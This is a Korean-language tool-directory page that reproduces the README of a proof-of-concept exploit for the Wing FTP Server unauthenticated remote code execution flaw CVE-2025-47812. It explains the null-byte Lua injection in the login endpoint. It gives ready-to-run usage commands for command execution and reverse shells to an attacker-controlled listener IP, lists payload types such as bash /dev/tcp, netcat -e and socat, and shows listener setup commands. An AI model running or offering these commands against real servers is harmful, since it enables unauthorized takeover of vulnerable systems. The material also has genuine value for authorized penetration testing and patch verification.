Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-47812-PoC — Wing FTP Server(CVE-2025-47812)용 인증되지 않은 원격 코드 실행 익스플로잇으로, 여러 리버스 셸 페이로드, 대화형 및 CLI 모드, 자동 세션 처리를 지원합니다. | Kitploit
도구/GitHubGitHub/havbay/cve-2025-47812-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Wing FTP Server(CVE-2025-47812)용 인증되지 않은 원격 코드 실행 익스플로잇으로, 여러 리버스 셸 페이로드, 대화형 및 CLI 모드, 자동 세션 처리를 지원합니다.

저장소 보기
117개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-47812 — Wing FTP Server 원격 코드 실행 (RCE)

Python CVSS Type

개요

필드값
CVECVE-2025-47812
영향받는 버전Wing FTP Server < 7.4.4
유형인증 없는 원격 코드 실행
CVSS 점수10.0 (치명적)
수정 버전Wing FTP Server 7.4.4

동작 원리

이 취약점은 /loginok.html 로그인 엔드포인트에 존재합니다. 서버는 username 필드의 널 바이트(%00)를 제대로 검증하지 못합니다. 이로 인해 공격자는 세션 파일에 임의의 Lua 코드를 주입할 수 있으며, 이 세션 파일은 /dir.html과 같은 엔드포인트에 접근할 때 서버 측에서 평가됩니다. 이 과정에는 어떠한 인증도 필요하지 않습니다.

참고: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


기능

  • 인증 없는 명령 실행
  • 다양한 리버스 셸 페이로드 (socat, bash, python3, nc-e, nc-fifo, php)
  • 완전한 인터랙티브 TTY를 위해 socat 페이로드 우선 사용
  • 대상 연결 가능성 사전 점검
  • 시도마다 새 세션을 사용한 자동 세션 UID 추출
  • --payload 플래그로 특정 페이로드 선택
  • -o 옵션으로 명령 출력을 파일에 저장
  • 설정 가능한 --timeout 및 --delay
  • -v 옵션을 통한 상세/디버그 모드
  • Ctrl+C 우아한 처리
  • 리버스 셸 시도 후 페이로드 요약
  • CLI 인자 모드 + 인터랙티브 메뉴
  • 색상으로 구분된 출력

요구 사항

pip install requests

사용법

인터랙티브 모드

python3 wingftp_rce_exploit.py

CLI 모드

# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

모든 옵션

-u / --url        Target base URL
-U / --username   Login username (default: anonymous)
-c / --command    Command to run (command mode)
-r / --rhost      Your listener IP (reverse shell mode)
-p / --rport      Your listener port (reverse shell mode)
     --payload    Specific payload to use (see list below)
     --timeout    HTTP request timeout in seconds (default: 10)
     --delay      Delay between payload attempts in seconds (default: 4)
-o / --output     Save command output to file
-v / --verbose    Enable debug output

리버스 셸 페이로드

이름방식
socatsocat을 통한 전체 PTY
bash/dev/tcp 리다이렉트
python3소켓 서브프로세스
nc-e-e 플래그를 사용하는 Netcat
nc-fifoNetcat + mkfifo
phpPHP fsockopen

예시

명령 실행

Target URL : http://192.168.1.10:5466
Username   : anonymous
Choice     : 1
Command    : whoami

리버스 셸

1단계 — 리스너 시작 (전체 TTY에는 socat 권장):

socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

또는 nc 사용:

nc -lvnp 4444

2단계 — 익스플로잇 실행:

python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

크레딧

  • 원본 PoC: blindma1den
  • 개선 및 확장: Havbuy

면책 조항

이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다.
소유하지 않았거나 명시적인 서면 허가를 받지 않은 시스템에는 사용하지 마십시오.
무단 사용은 불법입니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드